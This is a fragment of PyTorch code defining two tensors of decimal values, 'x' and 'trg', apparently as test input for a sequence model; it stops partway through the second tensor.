x = torch.tensor([[0.1,0.8,0.8,0.4,0.9,0.4,0.4,0.5,0.4,0.2,0.3,0.8,0.2,0.7,0.6,0.1,0.2,0.1,0.1,0.4,0.2,0.1,0.0,0.5,0.2,0.4,0.3,0.3,0.7,0.1,0.4,0.6,0.5,1.0,0.1,0.8,0.9,0.0,0.2,0.9,0.8,0.0,0.9,0.7,0.2,0.2,0.9,0.6,0.1,0.2,0.6,0.0,0.1,0.1,0.3,0.5,0.8,0.8,0.4,0.4,0.7,0.7,0.4,0.2,0.1,1.0,0.3,0.8,0.1,0.7,0.7,0.9,0.6,0.3,0.8,0.2,0.9,0.6,0.7,0.8,0.2,0.1,1.0,0.6,0.5,0.5,0.5,0.8,0.8,0.3,0.1,0.2,0.5,0.9,0.6,0.8,0.0,0.6,0.2,0.1,0.8,0.4,0.8,0.5,0.8,0.4,0.7,0.6,0.8,0.1,0.4,0.8,1.0,0.9,0.4,0.4,0.4,0.1,0.7,0.3,0.8,0.6,0.4,0.5,0.9,0.1,0.9,0.7,0.4,0.7,0.1,0.8,0.2,0.2,0.7,0.2,0.9,0.6,0.2,0.9,0.1,0.9,0.2,1.0,0.9,0.6,0.3,0.6,0.9,0.6,0.0,0.3,0.4,0.6,0.7,0.9,0.2,0.6,0.2,0.5,0.3,0.3,0.4,0.4,0.1,0.2,0.6,0.0,0.7,0.5,0.5,0.2,0.5,0.6,0.5,0.5,0.7,0.8,0.4,0.5,0.8,0.8,0.1,0.5,0.7,0.8,0.1,0.1,0.8,0.6,0.6,0.4,1.0,0.4,0.6,0.9,0.1,0.6,0.3,1.0,0.7,0.2,0.5,0.5,1.0,0.5,0.4,0.3,0.7,0.1,1.0,0.9,0.4,0.6,0.6,0.6,0.2,0.0,0.9,0.9,0.2,0.1,0.5,0.5,0.8,0.7,0.8,0.0,0.0,0.1,0.5,0.5,0.5,0.8,0.1,0.5,1.0,0.3,0.2,0.8,0.9,0.4,0.4,0.9,0.2,0.4,0.9,0.9,0.3,0.7,0.4,0.9,0.5,0.7,0.8,0.5,0.5,0.5,0.8,0.7,0.9,0.2,0.8,1.0,0.1,0.9,0.6,0.5,0.0,0.2,0.8,0.2,0.8,0.5,0.9,0.9,0.5,0.6,0.1,0.8,1.0,0.3,0.1,0.5,0.9,0.1,0.0,0.5,0.3,0.1,0.5,0.8,0.3,0.4,0.4,0.3,0.2,0.8,0.7,0.6,0.3,0.5,0.1,0.7,0.4,0.2,0.1,0.1,0.4,0.2,0.8,0.8,0.4,0.1,0.0,0.3,0.2,0.0,1.0,0.2,0.6,0.5,0.7,0.7,0.7,0.1,0.2,0.1,0.1,0.9,0.6,0.5,1.0,0.4,0.4,0.8,0.7,0.5,0.6,0.9,0.0,0.8,0.3,0.1,0.5,0.9,0.9,0.9,0.7,0.7,1.0,0.6,0.6,1.0,0.8,1.0,0.4,0.3,0.2,1.0,0.9,0.2,0.7,0.1,0.3,0.1,0.1,0.7,0.6,0.8,0.8,0.7,0.7,0.4,0.8,0.4,0.1,0.0,1.0,0.2,0.6,0.8,0.3,0.9,0.3,0.6,0.6,0.4,0.7,0.0,0.2,0.9,0.2,0.1,0.4,0.9,0.5,0.2,0.4,1.0,0.1,0.3,0.8,0.8,0.2,0.2,0.6,0.8,0.1,0.0,0.5,1.0,0.5,0.7,0.3,0.5,0.0,0.2,0.6,0.7,0.6,0.4,0.2,0.0,0.4,0.4,0.0,0.3,0.3,0.8,0.5,0.7,0.4,0.1,0.8,0.4,0.1,0.3,1.0,0.3,0.6,0.5,0.6,0.2,0.9,0.4,0.4,0.8,0.0,0.3,0.8,0.3,0.1,0.0,0.5,0.5,0.8,0.6,1.0,0.7,0.8,0.7,0.7,0.6,0.0,0.6,0.6,0.3,0.7,0.2,1.0,0.6,0.4,0.8,0.4,0.7,0.3,0.8,0.8,0.1,0.1,0.2,0.2,0.7,0.1,0.8,0.4,1.0,0.6,1.0,0.3,0.9,0.9,0.9,0.9,1.0,0.2,0.3,0.9,0.5,0.5,0.4,0.1,0.4,0.0,0.7,0.2,0.6,0.8,0.2,0.8,0.2,0.6,0.9,0.1,0.3,0.4,0.2,0.9,0.3,0.9,0.1,0.1,0.7,1.0,0.4,0.2,0.9,0.2,0.5,0.1,0.3,0.6,0.5,0.6,0.5,0.3,0.4,0.3,0.9,0.7,0.1,0.2,0.8,1.0,0.5,0.0,0.8,0.2,0.2,0.0,1.0,0.2,1.0,0.5,1.0,0.9,0.5,0.2,0.5,0.8,0.4,0.9,0.9,0.2,0.5,0.5,0.2,0.6,0.3,0.3,0.8,0.3,0.5,0.4,0.2,0.7,0.8,0.9,0.2,0.9,0.6,0.0,0.3,0.8,0.5,0.3,0.9,0.9,0.7,0.4,0.9,0.3,0.7,0.4,0.3,0.5,0.8,0.9,0.7,0.6,0.5,0.1,0.9,0.6,0.5,0.2,0.7,0.3,0.3,0.1,0.0,0.2,0.5,0.9,0.7,0.3,0.3,1.0,0.3,0.6,0.9,0.1,0.9,0.3,0.7,0.1,0.7,0.6,0.6,0.5,0.1,0.1,0.3,0.5,0.7,0.1,0.7,0.4,0.8,0.4,0.6,0.8,0.7,0.6,0.0,0.1,0.3,0.8,0.2,0.5,0.7,0.0,0.4,1.0,0.2,0.2,0.4,0.3,0.9,0.2,0.4,0.3,0.4,0.2,0.5,0.6,0.6,0.8,0.7,0.3,0.1,0.7,0.5,0.1,0.4,1.0,0.2,0.8,0.5,0.7,0.3,0.7,0.6,0.7,0.5,1.0,0.2,0.8,0.0,0.1,0.2,0.6,0.0,0.2,0.1,0.2,0.4,0.6,0.2,1.0,0.3,0.1,0.1,0.7,0.0,0.7,0.0,0.7,0.9,0.1,0.2,0.8,0.7,0.5,0.3,0.8,0.3,0.0,0.1,0.1,0.8,0.9,0.2,0.5,0.5,0.4,0.4,0.8,0.9,0.4,1.0,0.8,0.4,0.2,0.1,0.3,0.1,0.7,0.9,0.2,0.9,0.8,0.7,0.2,0.7,0.4,0.0,1.0,0.7,0.3,0.6,0.9,0.1,0.5,0.2,0.5,0.7,0.3,0.9,0.7,0.2,1.0,0.6,0.4,0.3,0.1,0.1,0.0,0.3,0.9,0.7,0.5,0.9,0.8,0.6,0.8,0.1,0.4,0.5,0.8,0.7,0.4,0.8,0.4,0.1,0.6,0.8,0.0,0.9,0.7,0.7,0.7,0.7,0.3,0.4,0.4,0.2,0.6,0.3,0.4,1.0,0.2,0.3,0.0,0.5,1.0,0.8,0.7,0.3,0.2,0.7,0.1,0.5,0.2,0.3,0.4,0.8,0.4,0.2,0.3,0.9,0.5,0.1,0.7,0.0,0.3,0.3,0.1,0.1,0.8,0.2,0.6,0.2,0.0,0.3,0.6,0.4,0.7,0.6,0.2,0.8,0.4,0.3,0.7,0.3,0.7,0.9,0.4,0.8,0.9,0.4,0.5,0.4,0.6,0.7,0.5,0.6,0.6,0.4,0.4,0.8,0.3,0.9,0.8,0.9,0.6,0.1,0.9,1.0,1.0,0.8,0.8,0.2,0.1,0.1,0.4,0.9,0.9,0.9,0.6,0.4,0.8,0.6,0.6,0.4,0.6,0.6,0.8,1.0,0.2,0.3,0.4,0.9,0.3,0.7,0.9,0.6,1.0,0.5,0.3,0.5,0.9,0.1,0.9,0.6,0.4,0.9,0.9,0.7,0.9,0.0,0.3,0.7,0.2,0.1,0.2,0.6,0.1,0.6,0.3,0.5,0.1,0.5,0.7,0.1,0.9,0.4,0.1,0.4,1.0,0.1,0.7,0.5,0.6,0.1,0.4,1.0,0.3,0.8,0.3,0.9,0.8,0.9,0.4,0.2,0.2,0.7,0.0,0.8,0.7,0.3,0.2,0.2,0.3,0.9,0.8,0.2,0.3,0.4,0.2,0.9,0.4,0.6,0.2,0.5,0.6,0.0,0.3,0.2,0.9,0.7,0.5,0.7,0.8,0.8,0.2,0.7,0.7,0.5,0.1,0.0,0.3,0.6,0.4,1.0,1.0,0.1,0.2,0.4,0.5,0.0,0.2,0.6,0.8,0.7,0.5,0.2,0.3,0.7,0.4,0.7,0.8,0.2,0.7,0.8,0.9,0.7,0.2,0.5,0.7,0.9,0.7,0.5,0.1,1.0,0.5,0.6,0.9,0.5,0.7,0.3,0.9,0.8],
[0.5,0.6,0.0,0.9,0.9,0.4,0.4,0.9,0.1,0.7,0.8,0.7,1.0,0.5,0.6,0.5,0.9,0.7,0.2,0.4,0.6,0.7,0.4,0.2,0.3,0.3,0.9,1.0,0.0,0.5,0.5,0.6,0.1,0.6,0.1,1.0,0.8,0.4,0.2,0.6,0.9,0.2,0.1,0.5,0.0,0.5,0.3,0.9,0.5,0.0,0.9,0.4,0.4,0.5,0.7,0.9,0.1,0.9,0.0,0.2,0.6,0.8,0.7,0.1,0.6,0.2,0.2,0.8,0.7,0.2,0.1,0.2,0.6,0.8,0.6,0.4,0.8,0.8,0.9,0.7,0.8,0.4,0.5,0.1,0.7,0.9,0.2,0.3,0.0,0.7,0.0,0.1,0.7,0.8,0.9,0.7,0.6,0.3,0.7,0.7,0.2,0.1,0.3,0.7,0.3,0.8,0.2,0.1,0.8,0.9,0.2,0.4,0.5,0.5,0.9,0.9,0.3,0.7,0.1,0.6,0.7,0.2,0.6,0.9,0.8,0.7,0.0,0.4,0.1,0.6,0.5,0.1,0.8,0.7,0.9,0.7,0.5,0.7,0.8,0.8,0.2,0.5,0.3,0.4,0.8,0.4,0.1,0.3,0.4,0.3,0.4,0.7,0.4,0.7,0.9,0.2,0.8,0.3,0.8,0.3,0.8,0.7,0.3,0.4,0.4,0.6,0.1,0.3,0.6,0.5,0.9,0.7,0.3,0.6,0.5,0.3,0.4,0.2,0.8,0.3,0.1,0.9,0.9,0.6,0.1,0.4,0.2,0.4,0.8,0.9,0.1,0.4,0.8,0.5,0.4,0.8,0.9,1.0,0.1,0.8,0.8,0.8,0.8,0.8,0.3,0.1,1.0,0.2,0.9,0.2,0.9,0.7,0.9,1.0,0.4,0.2,0.5,0.4,0.3,0.2,0.1,0.1,0.8,0.7,0.0,0.3,1.0,1.0,0.0,0.5,0.0,0.5,0.6,0.8,0.2,0.4,0.0,0.8,0.5,0.8,0.6,0.3,0.4,0.7,0.9,0.0,0.8,0.7,0.9,0.9,0.2,0.3,0.3,0.9,0.3,0.3,0.3,0.6,0.8,0.5,0.5,0.0,0.5,0.8,1.0,0.4,1.0,0.3,0.5,0.5,0.6,0.6,0.7,0.1,0.3,0.6,0.4,0.2,0.8,1.0,0.6,0.9,0.7,0.5,0.1,0.7,0.6,1.0,0.4,0.9,0.3,0.6,0.1,1.0,0.8,0.7,0.7,0.5,0.0,0.6,0.5,1.0,0.6,0.9,0.8,0.9,0.7,1.0,0.9,1.0,0.3,0.2,0.5,0.3,0.8,0.1,0.9,0.6,0.9,0.9,0.3,0.4,0.1,0.6,0.0,0.0,0.2,0.2,0.9,0.9,0.6,1.0,0.2,0.7,1.0,0.8,1.0,0.2,0.3,0.3,0.9,0.5,0.1,0.2,0.5,0.9,0.1,0.5,0.2,1.0,0.7,0.4,0.2,0.1,0.4,0.4,0.7,0.8,0.3,0.6,0.0,1.0,0.8,1.0,0.1,0.2,0.9,0.4,0.8,0.0,0.0,1.0,0.1,0.3,0.0,0.7,0.6,0.9,0.4,0.4,0.9,0.4,0.8,0.7,0.7,0.5,0.3,0.6,0.5,0.5,0.5,0.9,0.8,0.4,0.8,0.6,0.4,0.2,0.9,1.0,0.8,0.2,0.2,0.8,0.9,0.7,0.1,0.8,0.7,0.3,0.1,0.2,0.3,0.6,0.6,0.6,0.7,0.4,0.1,0.9,0.5,0.5,0.5,0.4,0.6,0.2,0.7,0.6,0.3,0.3,0.2,0.4,0.2,0.9,0.9,0.9,0.7,0.8,0.3,0.0,0.4,0.1,0.9,0.6,0.3,0.0,0.7,0.1,0.8,0.6,0.3,0.6,0.8,0.2,0.1,0.4,0.8,0.9,1.0,0.7,0.8,0.1,0.4,0.1,0.4,0.9,0.4,0.6,0.7,0.2,0.5,0.6,0.8,0.6,0.6,0.9,0.7,0.4,0.3,0.5,0.1,0.8,0.9,0.4,0.0,0.4,0.0,0.3,0.6,0.8,0.1,0.4,0.1,0.6,0.7,0.1,0.0,0.0,0.0,0.8,0.7,0.6,0.8,0.6,0.9,0.1,0.4,0.0,0.4,0.0,0.4,0.7,0.5,0.1,0.9,0.3,0.3,0.1,0.3,0.6,0.6,0.8,0.8,0.9,0.2,0.0,0.6,0.3,1.0,0.6,0.7,1.0,1.0,0.9,0.4,0.1,0.6,0.9,0.1,0.1,0.1,0.2,0.5,0.0,0.8,0.5,0.0,0.8,0.4,0.1,0.2,0.2,0.8,0.9,0.6,0.3,0.2,0.5,0.0,0.1,0.1,0.8,0.9,1.0,0.8,0.2,0.8,0.3,0.8,0.2,0.0,0.1,1.0,0.7,0.1,0.8,0.2,0.5,0.3,0.6,0.1,0.7,0.7,0.5,0.2,0.3,0.5,0.5,1.0,0.2,0.3,0.4,0.1,0.1,0.7,1.0,0.7,0.6,0.9,1.0,0.4,0.8,0.1,0.4,0.1,0.9,0.7,0.4,0.0,0.0,0.3,0.3,0.5,0.6,0.3,0.8,0.5,0.3,0.1,0.9,0.5,0.1,0.3,0.9,0.4,0.3,0.4,0.2,0.9,0.5,0.4,0.9,0.8,0.9,0.9,0.9,0.6,0.6,0.3,0.4,0.3,0.3,0.4,0.4,0.2,0.3,0.7,0.1,0.4,0.1,0.7,0.2,0.7,0.7,0.1,0.3,1.0,0.4,0.4,0.0,0.1,0.4,0.6,0.9,0.5,0.1,0.6,0.9,0.1,0.2,0.4,0.5,0.5,0.1,0.7,0.0,0.1,1.0,0.6,0.1,0.5,0.7,0.2,0.7,0.1,0.1,0.5,0.5,0.2,0.7,0.0,0.9,0.3,0.2,0.9,0.2,0.2,0.5,0.5,0.6,0.3,0.4,0.9,0.4,0.5,0.8,0.1,0.4,0.5,0.9,0.5,0.4,0.3,1.0,0.7,0.5,0.1,0.0,0.3,0.0,0.5,0.5,0.9,0.6,0.3,0.7,0.1,0.9,0.1,0.9,0.1,0.8,0.0,0.9,0.0,0.0,0.7,0.6,1.0,0.5,0.9,0.7,0.4,0.5,0.6,0.3,0.6,0.9,0.4,0.3,0.3,1.0,0.2,1.0,0.3,0.7,0.9,0.8,0.8,0.7,0.6,0.6,0.8,0.5,0.3,0.4,0.5,0.1,0.3,0.4,0.0,0.2,0.8,0.3,1.0,0.5,0.0,0.7,0.9,0.3,0.3,0.9,0.9,0.5,0.0,0.0,0.6,0.7,0.6,0.5,0.1,0.8,0.3,0.3,0.1,0.7,0.0,0.6,0.0,0.1,0.9,0.1,0.4,0.1,0.5,1.0,0.3,0.2,0.8,0.6,0.3,0.5,0.3,0.1,0.9,0.1,0.9,0.9,0.1,0.8,0.7,0.8,0.3,0.5,1.0,0.1,0.7,0.4,0.7,0.7,0.9,0.9,1.0,0.3,0.8,0.3,0.3,0.5,0.2,0.6,0.4,0.5,0.7,0.8,0.9,0.8,0.9,0.2,0.0,0.5,0.2,1.0,0.7,0.4,0.1,0.6,0.6,0.0,0.4,0.6,0.6,0.4,0.1,0.7,1.0,0.1,0.4,0.3,0.9,0.1,0.0,0.1,0.6,0.1,1.0,0.1,0.3,0.3,0.4,0.3,0.8,0.2,0.5,0.1,0.3,0.8,0.7,0.0,0.4,0.5,0.2,0.0,0.5,0.8,0.2,0.6,0.9,0.8,0.9,0.5,0.7,0.5,0.9,0.9,0.3,0.5,0.3,1.0,0.8,0.7,0.9,0.6,0.6,0.5,0.8,0.2,0.7,0.6,0.3,0.1,0.9,0.2,0.4,0.9,0.3,0.2,0.5,0.5,0.9,0.2,1.0,0.9,0.8,0.2,0.2,1.0,0.4,0.4,0.6,0.8,0.3,0.2,0.6,0.0,0.5,0.9,0.6,0.3,0.4,0.8,0.5,0.6,0.7,0.6,0.0,0.1,0.3,0.7,0.4,0.1,0.2,0.7,0.2,0.3,0.8,0.2,0.4,0.2,1.0,1.0,0.7,0.8,0.2,0.5,0.3,0.5,0.4,0.6,0.5,0.3,0.6,0.5,1.0,0.7,0.8,0.9,0.0,0.6,0.3,0.9,0.3,0.9,0.5,0.7,0.5,0.1,0.1,0.3,0.7,0.8,0.1,0.0,0.7,0.5,1.0,0.3,0.8,0.7,0.7,0.2,0.9,0.5,0.6,0.1,0.5,0.5,0.0,0.2,0.7,0.9,0.1,0.9,0.3,0.2]]).to(
device, dtype=torch.int64
)
trg = torch.tensor([[0.5,0.6,0.0,0.9,0.9,0.4,0.4,0.9,0.1,0.7,0.8,0.7,1.0,0.5,0.6,0.5,0.9,0.7,0.2,0.4,0.6,0.7,0.4,0.2,0.3,0.3,0.9,1.0,0.0,0.5,0.5,0.6,0.1,0.6,0.1,1.0,0.8,0.4,0.2,0.6,0.9,0.2,0.1,0.5,0.0,0.5,0.3,0.9,0.5,0.0,0.9,0.4,0.4,0.5,0.7,0.9,0.1,0.9,0.0,0.2,0.6,0.8,0.7,0.1,0.6,0.2,0.2,0.8,0.7,0.2,0.1,0.2,0.6,0.8,0.6,0.4,0.8,0.8,0.9,0.7,0.8,0.4,0.5,0.1,0.7,0.9,0.2,0.3,0.0,0.7,0.0,0.1,0.7,0.8,0.9,0.7,0.6,0.3,0.7,0.7,0.2,0.1,0.3,0.7,0.3,0.8,0.2,0.1,0.8,0.9,0.2,0.4,0.5,0.5,0.9,0.9,0.3,0.7,0.1,0.6,0.7,0.2,0.6,0.9,0.8,0.7,0.0,0.4,0.1,0.6,0.5,0.1,0.8,0.7,0.9,0.7,0.5,0.7,0.8,0.8,0.2,0.5,0.3,0.4,0.8,0.4,0.1,0.3,0.4,0.3,0.4,0.7,0.4,0.7,0.9,0.2,0.8,0.3,0.8,0.3,0.8,0.7,0.3,0.4,0.4,0.6,0.1,0.3,0.6,0.5,0.9,0.7,0.3,0.6,0.5,0.3,0.4,0.2,0.8,0.3,0.1,0.9,0.9,0.6,0.1,0.4,0.2,0.4,0.8,0.9,0.1,0.4,0.8,0.5,0.4,0.8,0.9,1.0,0.1,0.8,0.8,0.8,0.8,0.8,0.3,0.1,1.0,0.2,0.9,0.2,0.9,0.7,0.9,1.0,0.4,0.2,0.5,0.4,0.3,0.2,0.1,0.1,0.8,0.7,0.0,0.3,1.0,1.0,0.0,0.5,0.0,0.5,0.6,0.8,0.2,0.4,0.0,0.8,0.5,0.8,0.6,0.3,0.4,0.7,0.9,0.0,0.8,0.7,0.9,0.9,0.2,0.3,0.3,0.9,0.3,0.3,0.3,0.6,0.8,0.5,0.5,0.0,0.5,0.8,1.0,0.4,1.0,0.3,0.5,0.5,0.6,0.6,0.7,0.1,0.3,0.6,0.4,0.2,0.8,1.0,0.6,0.9,0.7,0.5,0.1,0.7,0.6,1.0,0.4,0.9,0.3,0.6,0.1,1.0,0.8,0.7,0.7,0.5,0.0,0.6,0.5,1.0,0.6,0.9,0.8,0.9,0.7,1.0,0.9,1.0,0.3,0.2,0.5,0.3,0.8,0.1,0.9,0.6,0.9,0.9,0.3,0.4,0.1,0.6,0.0,0.0,0.2,0.2,0.9,0.9,0.6,1.0,0.2,0.7,1.0,0.8,1.0,0.2,0.3,0.3,0.9,0.5,0.1,0.2,0.5,0.9,0.1,0.5,0.2,1.0,0.7,0.4,0.2,0.1,0.4,0.4,0.7,0.8,0.3,0.6,0.0,1.0,0.8,1.0,0.1,0.2,0.9,0.4,0.8,0.0,0.0,1.0,0.1,0.3,0.0,0.7,0.6,0.9,0.4,0.4,0.9,0.4,0.8,0.7,0.7,0.5,0.3,0.6,0.5,0.5,0.5,0.9,0.8,0.4,0.8,0.6,0.4,0.2,0.9,1.0,0.8,0.2,0.2,0.8,0.9,0.7,0.1,0.8,0.7,0.3,0.1,0.2,0.3,0.6,0.6,0.6,0.7,0.4,0.1,0.9,0.5,0.5,0.5,0.4,0.6,0.2,0.7,0.6,0.3,0.3,0.2,0.4,0.2,0.9,0.9,0.9,0.7,0.8,0.3,0.0,0.4,0.1,0.9,0.6,0.3,0.0,0.7,0.1,0.8,0.6,0.3,0.6,0.8,0.2,0.1,0.4,0.8,0.9,1.0,0.7,0.8,0.1,0.4,0.1,0.4,0.9,0.4,0.6,0.7,0.2,0.5,0.6,0.8,0.6,0.6,0.9,0.7,0.4,0.3,0.5,0.1,0.8,0.9,0.4,0.0,0.4,0.0,0.3,0.6,0.8,0.1,0.4,0.1,0.6,0.7,0.1,0.0,0.0,0.0,0.8,0.7,0.6,0.8,0.6,0.9,0.1,0.4,0.0,0.4,0.0,0.4,0.7,0.5,0.1,0.9,0.3,0.3,0.1,0.3,0.6,0.6,0.8,0.8,0.9,0.2,0.0,0.6,0.3,1.0,0.6,0.7,1.0,1.0,0.9,0.4,0.1,0.6,0.9,0.1,0.1,0.1,0.2,0.5,0.0,0.8,0.5,0.0,0.8,0.4,0.1,0.2,0.2,0.8,0.9,0.6,0.3,0.2,0.5,0.0,0.1,0.1,0.8,0.9,1.0,0.8,0.2,0.8,0.3,0.8,0.2,0.0,0.1,1.0,0.7,0.1,0.8,0.2,0.5,0.3,0.6,0.1,0.7,0.7,0.5,0.2,0.3,0.5,0.5,1.0,0.2,0.3,0.4,0.1,0.1,0.7,1.0,0.7,0.6,0.9,1.0,0.4,0.8,0.1,0.4,0.1,0.9,0.7,0.4,0.0,0.0,0.3,0.3,0.5,0.6,0.3,0.8,0.5,0.3,0.1,0.9,0.5,0.1,0.3,0.9,0.4,0.3,0.4,0.2,0.9,0.5,0.4,0.9,0.8,0.9,0.9,0.9,0.6,0.6,0.3,0.4,0.3,0.3,0.4,0.4,0.2,0.3,0.7,0.1,0.4,0.1,0.7,0.2,0.7,0.7,0.1,0.3,1.0,0.4,0.4,0.0,0.1,0.4,0.6,0.9,0.5,0.1,0.6,0.9,0.1,0.2,0.4,0.5,0.5,0.1,0.7,0.0,0.1,1.0,0.6,0.1,0.5,0.7,0.2,0.7,0.1,0.1,0.5,0.5,0.2,0.7,0.0,0.9,0.3,0.2,0.9,0.2,0.2,0.5,0.5,0.6,0.3,0.4,0.9,0.4,0.5,0.8,0.1,0.4,0.5,0.9,0.5,0.4,0.3,1.0,0.7,0.5,0.1,0.0,0.3,0.0,0.5,0.5,0.9,0.6,0.3,0.7,0.1,0.9,0.1,0.9,0.1,0.8,0.0,0.9,0.0,0.0,0.7,0.6,1.0,0.5,0.9,0.7,0.4,0.5,0.6,0.3,0.6,0.9,0.4,0.3,0.3,1.0,0.2,1.0,0.3,0.7,0.9,0.8,0.8,0.7,0.6,0.6,0.8,0.5,0.3,0.4,0.5,0.1,0.3,0.4,0.0,0.2,0.8,0.3,1.0,0.5,0.0,0.7,0.9,0.3,0.3,0.9,0.9,0.5,0.0,0.0,0.6,0.7,0.6,0.5,0.1,0.8,0.3,0.3,0.1,0.7,0.0,0.6,0.0,0.1,0.9,0.1,0.4,0.1,0.5,1.0,0.3,0.2,0.8,0.6,0.3,0.5,0.3,0.1,0.9,0.1,0.9,0.9,0.1,0.8,0.7,0.8,0.3,0.5,1.0,0.1,0.7,0.4,0.7,0.7,0.9,0.9,1.0,0.3,0.8,0.3,0.3,0.5,0.2,0.6,0.4,0.5,0.7,0.8,0.9,0.8,0.9,0.2,0.0,0.5,0.2,1.0,0.7,0.4,0.1,0.6,0.6,0.0,0.4,0.6,0.6,0.4,0.1,0.7,1.0,0.1,0.4,0.3,0.9,0.1,0.0,0.1,0.6,0.1,1.0,0.1,0.3,0.3,0.4,0.3,0.8,0.2,0.5,0.1,0.3,0.8,0.7,0.0,0.4,0.5,0.2,0.0,0.5,0.8,0.2,0.6,0.9,0.8,0.9,0.5,0.7,0.5,0.9,0.9,0.3,0.5,0.3,1.0,0.8,0.7,0.9,0.6,0.6,0.5,0.8,0.2,0.7,0.6,0.3,0.1,0.9,0.2,0.4,0.9,0.3,0.2,0.5,0.5,0.9,0.2,1.0,0.9,0.8,0.2,0.2,1.0,0.4,0.4,0.6,0.8,0.3,0.2,0.6,0.0,0.5,0.9,0.6,0.3,0.4,0.8,0.5,0.6,0.7,0.6,0.0,0.1,0.3,0.7,0.4,0.1,0.2,0.7,0.2,0.3,0.8,0.2,0.4,0.2,1.0,1.0,0.7,0.8,0.2,0.5,0.3,0.5,0.4,0.6,0.5,0.3,0.6,0.5,1.0,0.7,0.8,0.9,0.0,0.6,0.3,0.9,0.3,0.9,0.5,0.7,0.5,0.1,0.1,0.3,0.7,0.8,0.1,0.0,0.7,0.5,1.0,0.3,0.8,0.7,0.7,0.2,0.9,0.5,0.6,0.1,0.5,0.5,0.0,0.2,0.7,0.9,0.1,0.9,0.3,0.2],
[0.5,0.6,0.0,0.9,0.9,0.4,0.4,0.9,0.1,0.7,0.8,0.7,1.0,0.5,0.6,0.5,0.9,0.7,0.2,0.4,0.6,0.7,0.4,0.2,0.3,0.3,0.9,1.0,0.0,0.5,0.5,0.6,0.1,0.6,0.1,1.0,0.8,0.4,0.2,0.6,0.9,0.2,0.1,0.5,0.0,0.5,0.3,0.9,0.5,0.0,0.9,0.4,0.4,0.5,0.7,0.9,0.1,0.9,0.0,0.2,0.6,0.8,0.7,0.1,0.6,0.2,0.2,0.8,0.7,0.2,0.1,0.2,0.6,0.8,0.6,0.4,0.8,0.8,0.9,0.7,0.8,0.4,0.5,0.1,0.7,0.9,0.2,0.3,0.0,0.7,0.0,0.1,0.7,0.8,0.9,0.7,0.6,0.3,0.7,0.7,0.2,0.1,0.3,0.7,0.3,0.8,0.2,0.1,0.8,0.9,0.2,0.4,0.5,0.5,0.9,0.9,0.3,0.7,0.1,0.6,0.7,0.2,0.6,0.9,0.8,0.7,0.0,0.4,0.1,0.6,0.5,0.1,0.8,0.7,0.9,0.7,0.5,0.7,0.8,0.8,0.2,0.5,0.3,0.4,0.8,0.4,0.1,0.3,0.4,0.3,0.4,0.7,0.4,0.7,0.9,0.2,0.8,0.3,0.8,0.3,0.8,0.7,0.3,0.4,0.4,0.6,0.1,0.3,0.6,0.5,0.9,0.7,0.3,0.6,0.5,0.3,0.4,0.2,0.8,0.3,0.1,0.9,0.9,0.6,0.1,0.4,0.2,0.4,0.8,0.9,0.1,0.4,0.8,0.5,0.4,0.8,0.9,1.0,0.1,0.8,0.8,0.8,0.8,0.8,0.3,0.1,1.0,0.2,0.9,0.2,0.9,0.7,0.9,1.0,0.4,0.2,0.5,0.4,0.3,0.2,0.1,0.1,0.8,0.7,0.0,0.3,1.0,1.0,0.0,0.5,0.0,0.5,0.6,0.8,0.2,0.4,0.0,0.8,0.5,0.8,0.6,0.3,0.4,0.7,0.9,0.0,0.8,0.7,0.9,0.9,0.2,0.3,0.3,0.9,0.3,0.3,0.3,0.6,0.8,0.5,0.5,0.0,0.5,0.8,1.0,0.4,1.0,0.3,0.5,0.5,0.6,0.6,0.7,0.1,0.3,0.6,0.4,0.2,0.8,1.0,0.6,0.9,0.7,0.5,0.1,0.7,0.6,1.0,0.4,0.9,0.3,0.6,0.1,1.0,0.8,0.7,0.7,0.5,0.0,0.6,0.5,1.0,0.6,0.9,0.8,0.9,0.7,1.0,0.9,1.0,0.3,0.2,0.5,0.3,0.8,0.1,0.9,0.6,0.9,0.9,0.3,0.4,0.1,0.6,0.0,0.0,0.2,0.2,0.9,0.9,0.6,1.0,0.2,0.7,1.0,0.8,1.0,0.2,0.3,0.3,0.9,0.5,0.1,0.2,0.5,0.9,0.1,0.5,0.2,1.0,0.7,0.4,0.2,0.1,0.4,0.4,0.7,0.8,0.3,0.6,0.0,1.0,0.8,1.0,0.1,0.2,0.9,0.4,0.8,0.0,0.0,1.0,0.1,0.3,0.0,0.7,0.6,0.9,0.4,0.4,0.9,0.4,0.8,0.7,0.7,0.5,0.3,0.6,0.5,0.5,0.5,0.9,0.8,0.4,0.8,0.6,0.4,0.2,0.9,1.0,0.8,0.2,0.2,0.8,0.9,0.7,0.1,0.8,0.7,0.3,0.1,0.2,0.3,0.6,0.6,0.6,0.7,0.4,0.1,0.9,0.5,0.5,0.5,0.4,0.6,0.2,0.7,0.6,0.3,0.3,0.2,0.4,0.2,0.9,0.9,0.9,0.7,0.8,0.3,0.0,0.4,0.1,0.9,0.6,0.3,0.0,0.7,0.1,0.8,0.6,0.3,0.6,0.8,0.2,0.1,0.4,0.8,0.9,1.0,0.7,0.8,0.1,0.4,0.1,0.4,0.9,0.4,0.6,0.7,0.2,0.5,0.6,0.8,0.6,0.6,0.9,0.7,0.4,0.3,0.5,0.1,0.8,0.9,0.4,0.0,0.4,0.0,0.3,0.6,0.8,0.1,0.4,0.1,0.6,0.7,0.1,0.0,0.0,0.0,0.8,0.7,0.6,0.8,0.6,0.9,0.1,0.4,0.0,0.4,0.0,0.4,0.7,0.5,0.1,0.9,0.3,0.3,0.1,0.3,0.6,0.6,0.8,0.8,0.9,0.2,0.0,0.6,0.3,1.0,0.6,0.7,1.0,1.0,0.9,0.4,0.1,0.6,0.9,0.1,0.1,0.1,0.2,0.5,0.0,0.8,0.5,0.0,0.8,0.4,0.1,0.2,0.2,0.8,0.9,0.6,0.3,0.2,0.5,0.0,0.1,0.1,0.8,0.9,1.0,0.8,0.2,0.8,0.3,0.8,0.2,0.0,0.1,1.0,0.7,0.1,0.8,0.2,0.5,0.3,0.6,0.1,0.7,0.7,0.5,0.2,0.3,0.5,0.5,1.0,0.2,0.3,0.4,0.1,0.1,0.7,1.0,0.7,0.6,0.9,1.0,0.4,0.8,0.1,0.4,0.1,0.9,0.7,0.4,0.0,0.0,0.3,0.3,0.5,0.6,0.3,0.8,0.5,0.3,0.1,0.9,0.5,0.1,0.3,0.9,0.4,0.3,0.4,0.2,0.9,0.5,0.4,0.9,0.8,0.9,0.9,0.9,0.6,0.6,0.3,0.4,0.3,0.3,0.4,0.4,0.2,0.3,0.7,0.1,0.4,0.1,0.7,0.2,0.7,0.7,0.1,0.3,1.0,0.4,0.4,0.0,0.1,0.4,0.6,0.9,0.5,0.1,0.6,